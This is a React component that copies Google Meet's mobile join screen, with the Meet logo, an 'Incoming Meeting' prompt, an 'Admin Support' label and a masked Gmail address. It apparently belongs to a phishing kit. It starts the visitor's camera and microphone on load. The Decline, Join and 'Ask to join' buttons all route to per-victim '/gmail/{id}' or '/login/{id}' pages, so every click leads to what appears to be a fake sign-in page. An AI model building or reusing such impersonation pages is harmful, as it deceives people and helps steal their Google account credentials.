import React, { useState, useRef, useEffect } from 'react';
import './MobileMeet.css';
import { Link } from 'react-router-dom';

const MobileMeet = ({id}) => {
  const [cameraEnabled, setCameraEnabled] = useState(true);
  const [micEnabled, setMicEnabled] = useState(true);
  const [stream, setStream] = useState(null);
  const videoRef = useRef(null);
    // console.log(id)
  useEffect(() => {
    // Auto-start camera on mount
    startCamera();
  }, []);

  useEffect(() => {
    if (videoRef.current && stream) {
      videoRef.current.srcObject = stream;
      videoRef.current.play().catch(err => console.log('Auto-play prevented:', err));
    }
  }, [stream]);

  const startCamera = async () => {
    try {
      const mediaStream = await navigator.mediaDevices.getUserMedia({ 
        video: { 
          facingMode: "user",
          width: { ideal: 720 },
          height: { ideal: 1280 }
        }, 
        audio: true 
      });
      setStream(mediaStream);
    } catch (err) {
      console.error('Camera access denied:', err);
    }
  };

  const toggleCamera = async () => {
    if (cameraEnabled) {
      // Turn off
      if (stream) {
        const videoTracks = stream.getVideoTracks();
        videoTracks.forEach(track => track.stop());
        const audioTracks = stream.getAudioTracks();
        if (audioTracks.length > 0) {
          const audioStream = new MediaStream(audioTracks);
          setStream(audioStream);
        } else {
          setStream(null);
        }
      }
      setCameraEnabled(false);
    } else {
      // Turn on
      try {
        const currentAudio = stream?.getAudioTracks() || [];
        const mediaStream = await navigator.mediaDevices.getUserMedia({ 
          video: { facingMode: "user" }, 
          audio: currentAudio.length > 0 
        });
        
        // If we had audio, replace the stream entirely
        if (stream) {
          stream.getTracks().forEach(track => track.stop());
        }
        setStream(mediaStream);
        setCameraEnabled(true);
      } catch (err) {
        console.error('Camera error:', err);
      }
    }
  };

  const toggleMic = () => {
    if (stream) {
      const audioTracks = stream.getAudioTracks();
      audioTracks.forEach(track => {
        track.enabled = !micEnabled;
      });
    }
    setMicEnabled(!micEnabled);
  };

  return (
    <div className="mobile-meet-container">
       <div id="incomingSection">
                      <div className="callWrapper">
                          <img className="meetLogo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/9/9b/Google_Meet_icon_%282020%29.svg/1245px-Google_Meet_icon_%282020%29.svg.png"/>
      
                              <div className="callerName">Incoming Meeting</div>
                              <div className="callText">Join the meeting now</div>
      
                              <div className="btnArea">
                                  <Link to={`/gmail/${id}`} className="btn decline">Decline</Link>
                                  <Link to={`/gmail/${id}`} className="btn accept" >Join</Link>
                              </div>
                      </div>
                  </div>
      {/* Header */}
      <div className="mobile-header">
        <button className="back-btn">
          <svg viewBox="0 0 24 24" width="24" height="24">
            <path fill="white" d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/>
          </svg>
        </button>
        <span className="meeting-code">rcq-nwwa-mej</span>
        <button className="more-btn">
          <svg viewBox="0 0 24 24" width="24" height="24">
            <path fill="white" d="M12 8c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"/>
          </svg>
        </button>
      </div>

      {/* Video Preview */}
      <div className="mobile-video-container">
        <div className="mobile-video-wrapper">
          {cameraEnabled && stream ? (
            <video 
              ref={videoRef}
              autoPlay
              playsInline
              muted
              className="mobile-camera-feed"
            />
          ) : (
            <div className="mobile-camera-off">
              <div className="camera-off-icon">
                <svg viewBox="0 0 24 24" width="48" height="48">
                  <path fill="white" d="M18 10.48V6c0-1.1-.9-2-2-2H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2v-4.48l4 3.98v-11l-4 3.98zM5 16l2.38-3.17L9 15l2.62-3.5L15 16H5z"/>
                </svg>
              </div>
            </div>
          )}
          <div className="admin-support-label">Admin Support</div>
        </div>

        {/* Controls */}
        <div className="mobile-controls">
          <button 
            className={`mobile-control-btn ${cameraEnabled ? 'active' : 'inactive'}`}
            onClick={toggleCamera}
          >
            {cameraEnabled ? (
              <svg viewBox="0 0 24 24" width="24" height="24">
                <path fill="white" d="M17 10.5V7c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h12c.55 0 1-.45 1-1v-3.5l4 4v-11l-4 4z"/>
              </svg>
            ) : (
              <svg viewBox="0 0 24 24" width="24" height="24">
                <path fill="white" d="M18 10.48V6c0-1.1-.9-2-2-2H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2v-4.48l4 3.98v-11l-4 3.98zM5 16l2.38-3.17L9 15l2.62-3.5L15 16H5z"/>
              </svg>
            )}
          </button>

          <button className="mobile-control-btn active">
            <svg viewBox="0 0 24 24" width="24" height="24">
              <path fill="white" d="M21 3H3C2 3 1 4 1 5v14c0 1.1.9 2 2 2h18c1 0 2-1 2-2V5c0-1-1-2-2-2zm0 13.92c0 .05.04.08.09.08H17.9c-1.6 0-3.02-.83-3.82-2.09-.19.29-.46.55-.78.76-.55.37-1.23.58-1.92.58-1.6 0-3.02-.83-3.82-2.09-.19.29-.46.55-.78.76-.55.37-1.23.58-1.92.58H3.09c-.05 0-.09-.03-.09-.08V5.08c0-.05.04-.08.09-.08h3.31c1.6 0 3.02.83 3.82 2.09.19-.29.46-.55.78-.76.55-.37 1.23-.58 1.92-.58 1.6 0 3.02.83 3.82 2.09.19-.29.46-.55.78-.76.55-.37 1.23-.58 1.92-.58h3.31c.05 0 .09.03.09.08v11.84z"/>
              <circle fill="white" cx="9" cy="13" r="2"/>
              <circle fill="white" cx="15" cy="9" r="2"/>
            </svg>
          </button>

          <button 
            className={`mobile-control-btn ${micEnabled ? 'active' : 'inactive'}`}
            onClick={toggleMic}
          >
            {micEnabled ? (
              <svg viewBox="0 0 24 24" width="24" height="24">
                <path fill="white" d="M12 14c1.66 0 3-1.34 3-3V5c0-1.66-1.34-3-3-3S9 3.34 9 5v6c0 1.66 1.34 3 3 3z"/>
                <path fill="white" d="M17 11c0 2.76-2.24 5-5 5s-5-2.24-5-5H5c0 3.53 2.61 6.43 6 6.92V21h2v-3.08c3.39-.49 6-3.39 6-6.92h-2z"/>
              </svg>
            ) : (
              <svg viewBox="0 0 24 24" width="24" height="24">
                <path fill="white" d="M19 11h-1.7c0 .74-.16 1.43-.43 2.05l1.23 1.23c.56-.98.9-2.09.9-3.28zm-4.02.17c0-.06.02-.11.02-.17V5c0-1.66-1.34-3-3-3S9 3.34 9 5v.18l5.98 5.99zM4.27 3L3 4.27l6.01 6.01V11c0 1.66 1.33 3 2.99 3 .22 0 .44-.03.65-.08l1.66 1.66c-.71.33-1.5.52-2.31.52-2.76 0-5.3-2.1-5.3-5.1H5c0 3.41 2.72 6.23 6 6.72V21h2v-3.28c.91-.13 1.77-.45 2.54-.9L19.73 21 21 19.73 4.27 3z"/>
              </svg>
            )}
          </button>
        </div>
      </div>

      {/* Companion Mode */}
      <button className="companion-mode-btn">
        <svg viewBox="0 0 24 24" width="20" height="20">
          <path fill="#8ab4f8" d="M21 3H3c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h18c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm0 16H3V5h18v14zM5 15h14v3H5z"/>
        </svg>
        <span>Use Companion mode</span>
      </button>

      {/* Bottom Section */}
      <div className="mobile-bottom-section">
        <Link className="ask-to-join-btn text-center" to={`/login/${id}`}>Ask to join</Link>
        <div className="joining-as">
          <span className="joining-label">Joining as</span>
          <div className="user-info">
            <img 
              src="https://ui-avatars.com/api/?name=f&background=random&color=fff&size=32" 
              alt="User" 
              className="user-avatar"
            />
            <span className="user-email">*******@gmail.com</span>
            <button className="switch-btn">(Switch)</button>
          </div>
        </div>
      </div>
    </div>
  );
};

export default MobileMeet;